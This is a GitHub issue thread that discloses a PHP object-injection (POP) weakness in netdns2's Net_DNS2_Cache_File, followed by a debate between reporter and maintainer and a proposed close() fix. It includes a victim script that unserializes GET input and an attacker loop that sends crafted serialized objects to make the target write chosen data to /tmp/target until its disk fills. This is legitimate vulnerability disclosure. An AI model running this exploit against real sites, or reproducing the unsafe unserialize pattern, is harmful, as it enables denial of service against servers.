### ISSUE TITLE
Net_DNS2_Cache_File facilitates POP attack on vulnerable code bases

### ISSUE THREAD

**Issue by bishopb** [mikepultz/netdns2#50]
An application that (a) unserializes user data and (b) exposes `Net_DNS2_Cache_File` on auto-load is vulnerable to attack, as follows.

On the victim machine, we have an innocent, but *naïve*, script:

```
<?php // index.php
require 'vendor/autoload.php'; // makes Net_DNS2_Cache_File autoloadable, even though
                               // that class not used in this script
$data = unserialize($_GET['data']);
if (is_array($data)) {
    // ...
} else {
    die('Sorry');
}
```

On the attacker machine, we have code to serialize a `Net_DNS2_Cache_File` and send it to our victim:

```
<?php // this runs on a completely different machine
$victim ='http://victim.org/index.php?data=%s';
$i = 0;
$cache = new \Net_DNS2_Cache_File;
while (++$i) {
    $cache->open('/tmp/target', PHP_INT_MAX, 'serialize');
    $cache->put($i, 'bye-bye');
    file_get_contents(sprintf($victim, urlencode(serialize($cache)))); // this is an HTTP GET call,
                                                                       // sending crafted serialized object over the wire
}
```

This works as follows:

1. The attacking machine crafts a serialized form of a `Net_DNS2_Cache_File` object.
2. The attacker sends this crafted serialized string to the victim, *over the wire*.
3. On the victim machine, `index.php` unserializes the `Net_DNS2_Cache_File` (as its available by the autoloader, though not explicitly used in index.php). The resurrected `Net_DNS2_Cache_File` object hangs around until it goes out of scope, at which point it writes *the data the attacker chose* into *the file the attacker chose*.
4. The attacker repeats this attack, changing the cache key each time, which causes the cache file on the victim machine to grow and grow and grow.

This is a [property-oriented programming (POP)-style attack](https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf), which relies on the fact that `Net_DNS2_Cache_File` has a file write operation in a magic method.

The recommended fix is to move the file write operation into an explicit `close` method. While this proposed `close` method may still be called with attack data, the key difference is that it's done explicitly by the developer rather than magically.

Props to [Evonide](https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/) for inspiring me to check for this kind of vulnerability.

**Comment by mikepultz** [comment]
Hey @bishopb,

I don't really see the issue here? I understand that because the write method happens in the __destruct() method automatically, it somewhat obfuscates the fact that something is being written on the victims host. But for this attack vector to work, the attacker needs access to create and execute PHP code on the victims host (i.e. it can't be exploited remotely).

If I'm an attacker, and I have access to write and execute PHP code on the victims host, I can think of hundreds of easier, faster, better ways to DOS this host? For example, I can create a one-line PHP script that pipes /dev/zero into /tmp/target and achieve the same goal, without requiring a remote "black hat" machine to do part of the work- and without generating thousand of web requests, which would ultimately slow down and give away the attack.

Also- there are many systems that automatically write on shutdown- most notably, the built-in PHP sessions. Granted, the sessions are limited to your max memory size- but as an attacker with access to the victim host, you could easy create a script that created a unique session per request, and fill it up with random data, up to the memory_limit value- which would automatically write on shutdown, creating essentially the same scenario.

Let me know if I'm missing something here? But in my mind, making this change doesn't resolve any actual problems? Once the attacker has enough access to the host to create this script, the attack can only be mitigated at the disk level- quotes, inode limits, permissions, separate partitions, etc.

Mike

**Comment by bishopb** [comment]
The setup: the attacker has *only wire access* to http://victim.org/index.php. The attacker sends a serialized `Net_DNS2_Cache_File` string over the wire, as part of the `GET`. This serialized string has all the object configuration the *attacker* wants to inflict on the victim. The victim innocently calls `unserialize` on the attacker-provided string, expecting something like a serialized array. The victim now has, in memory and from wire data only, a `Net_DNS2_Cache_File` object. What happens?

Whatever the victim does, eventually that object goes out of scope. Eventually its `__destruct` method is called. At destruction time, the victim is forced to accept whatever values the attacker provided over the wire being written to his (the victim's) disk. This is automatic, it's coded as part of the object mechanics.

My suggestion is to remove the automatic part. Same scenario. Attacker sends a serialized `Net_DNS2_Cache_File` over the wire. The victim unserializes it. The object goes out of scope. Since the write no longer is in `__destruct`, nothing happens. The only footprint is the memory the unserialized object occupied in its transient life. Nothing, however, is written to disk. 

If the victim is actually expecting a serialized `Net_DNS2_Cache_File` object, then he can call `close()` on it and *voilà* the data is written to disk.

The suggested change is to require positive developer action to commit the cache, rather than allowing it to happen implicitly.

**Comment by mikepultz** [comment]
Hey @bishopb,

I understand the logic around it, I just don't honestly agree that it's an actual problem.

The idea of unserialize() being used to inject objects and/or call magic methods has been around since php 4- they even put a half-assed attempt to fix it in 7 with the allowed_classes option. The fact is, if a developer is passing an un-sanitized string directly to unserialize(), then they're opening themselves up to an endless number of exploits.

I'm happy to add something to the code- but given that it would be a backwards incompatible change, not to mention how unlikely of exploit it would be, and the fact that it's limited in effectiveness by the URL length, or post_max_size and memory_limit values, it'll have to wait to be included in the next major release, so we don't' break anybodies code.

Mike

**Comment by bishopb** [comment]
Design changes that raise the ecosystem's net security are, in my opinion, a good investment.

I've opened [PR #51](https://github.com/mikepultz/netdns2/pull/51) that adds the `close` API and wires `__destruct` to it. A public boolean (`auto_close`) governs the call to close in dtor. Thus, a developer could stop the automagic from happening if she found her app under this kind of attack, like:

```
$data = unserialize($_GET['data']);
if ($data instanceof \Net_DNS2_Cache_File) {
    $data->auto_close = false;
    unset($data);
    error_log('Under attack');
    die('Honeypot');
} ...
```

**Comment by mikepultz** [comment]
Some for of this may be included the the next major release.

Mike
